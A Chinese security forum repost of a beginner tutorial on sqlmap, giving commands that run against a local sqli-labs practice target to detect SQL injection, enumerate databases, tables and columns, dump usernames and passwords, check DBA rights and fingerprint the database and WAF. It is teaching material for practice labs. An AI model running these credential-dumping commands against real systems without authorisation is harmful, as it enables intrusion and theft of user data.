安全矩阵

 找回密码
 立即注册
搜索
查看: 2147|回复: 0

2021Kali系列 -- Sqlmap基础操作

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-4-15 22:07:05 | 显示全部楼层 |阅读模式
原文链接:2021Kali系列 -- Sqlmap基础操作

踏实的感觉大概就是,因为你在,我不再招摇,因为我在,你不再动摇。。。

----  网易云热评


一、判断是否存在注入

1、sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1'   

2、有下面信息说明存在注入


二、获取数据库信息

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1'   --dbs

三、获取数据库security里面的表信息

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -D security --tables

四、获取数据库security中users表的字段信息

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -D security -T users --columns

五、获取数据库security中users表中的字段内容

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -D security -T users -C "password,username" --dump

六、查看数据库相关信息
1、获取数据库当前用户

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --current-user

2、查看是否是dba权限

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --is-dba

3、查看当前数据库名称

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --current-db

4、枚举数据库用户密码

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --passwords

5、枚举数据库用户名称

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --users

七、指纹识别
1、获取更广泛的数据库管理系统指纹识别结果

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -f

2、获取更精确的指纹识别结果

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' -b

八、WAF识别

sqlmap -u 'http://192.168.139.129:81/sqli/Less-1/?id=1' --identify-waf

禁止非法,后果自负
欢迎关注公众号:web安全工具库
欢迎关注视频号:之乎者也吧


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 02:28 , Processed in 0.015628 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表